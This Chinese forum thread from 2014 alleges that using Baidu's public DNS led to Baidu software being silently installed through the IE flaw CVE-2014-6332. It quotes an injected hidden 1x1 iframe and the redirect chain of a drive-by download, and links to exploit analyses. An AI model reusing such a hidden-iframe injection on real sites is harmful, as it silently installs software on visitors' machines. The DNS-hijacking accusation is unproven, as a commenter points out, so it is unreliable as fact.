使用百度DNS后机器被装百度卫士,疑为利用IE漏洞推广

zhq445078388

原文:
"
http://www.v2ex.com/t/151598 [百度也已经推出公共 DNS 服务]

今天早上看了这个帖子， 以前一直用的是 8.8.8.8

换了百度的dns之后，非常确认未做任何操作， 系统自动下载安装了
百度卫士
百度卫士-软件管理

之后一天内，系统弹出N个广告窗口 (以前从未弹出过)

现在虽然不能明确是换dns的问题， 但这也太巧了吧


再补充一下
当时好像有打开过IE的操作 (现在已经忘记了， 不太确认，但肯定没启动别的应用)

另外这几天看网页感觉有点卡， 昨天在任务管理器中发现了 两个 莫名的 baidu.exe**进程(任务栏里面没有)

经再查看， 程序安装所在目录为
C:\Users\***\AppData\xxx\baidu
还好，里面有个 uninstall.exe, 卸载之后没有再发现baidu相关的进程 (这个程序不知道什么时候安装的，也不知道是干什么的)
"
----------------------------------------到上面都是原文,和楼主没关系!!!!-------------------

结合之前的报道:
http://www.it.com.cn/news1/2014120417/1156464.html
百度联盟网站被指利用IE漏洞推广软件

对应的乌云链接:
http://www.wooyun.org/bugs/wooyun-2010-085575

详细说明为:
"
在费很大气把电脑救活之后，在一堆浏览器的历史记录找到了这个链接http://www.80ydw.com/movie/693.html

通过查看页面源代码，可以看到嵌入了如下代码：

<iframe src=http://hpa.pw/HHH width=1 height=1></iframe>

再查看http://hpa.pw/HHH的全文代码，会发现这个页面会跳转到http://221.233.160.110/images/xml.html

最终通过该页面，下载并自动执行http://dlsw.br.baidu.com/ditui/B ... 1.1.0.10_150946.exe，没错，来自百度有钱联盟的144MB的安装包。
"

有理由相信是使用百度DNS后,使用DNS挟持将一些广告的流量导向百度网盟

然后百度网盟使用最近公开的IE漏洞进行百度卫士的推广
而百度软件管理则是作为百度卫士的一个组件进入的用户机器

zhq445078388

利用的IE漏洞号:
CVE-2014-6332
相关报道:http://www.lupaworld.com/article-246086-1.html
被共开的时间是11月,也就是说有相当的一部分用户还没有打上这个不定

EXP及其分析:
http://blog.vulnhunt.com/index.p ... 4-6332_dve_exploit/

tuw

lz是360的员工啊，换了个头像都不认得了。

zhq445078388

tuw 发表于 2014-12-8 18:45
lz是360的员工啊，换了个头像都不认得了。

刚在转瀚海源的博客.然后就发现有人AT我说改成百度DNS后被装百度卫士.立刻就来兴趣了

r0_0t

真是他妈扯淡！看标题毫无疑问可言，内容却是：

之后一天内，系统弹出N个广告窗口 (以前从未弹出过)

现在虽然不能明确是换dns的问题， 但这也太巧了吧

说明你也没有证据啊，但是我已经用百度dns好几天了，为什么没有出现问题呢，我可从来没在论坛推销过BAT的东西，但是做人还是要凭一点良心，不要说瞎话，还TM是帮帮团的

瑟瑟深秋vip

百度除了搜索
不敢安装其他程序

zhq445078388

r0_0t 发表于 2014-12-8 18:57
真是他妈扯淡！看标题毫无疑问可言，内容却是：

说明你也没有证据啊，但是我已经用百度dns好几天了，为 ...

你说的对 我改下标题

a110

在国外用google dns ，回国用阿里。

绯色鎏金

百度的话，还真的有可能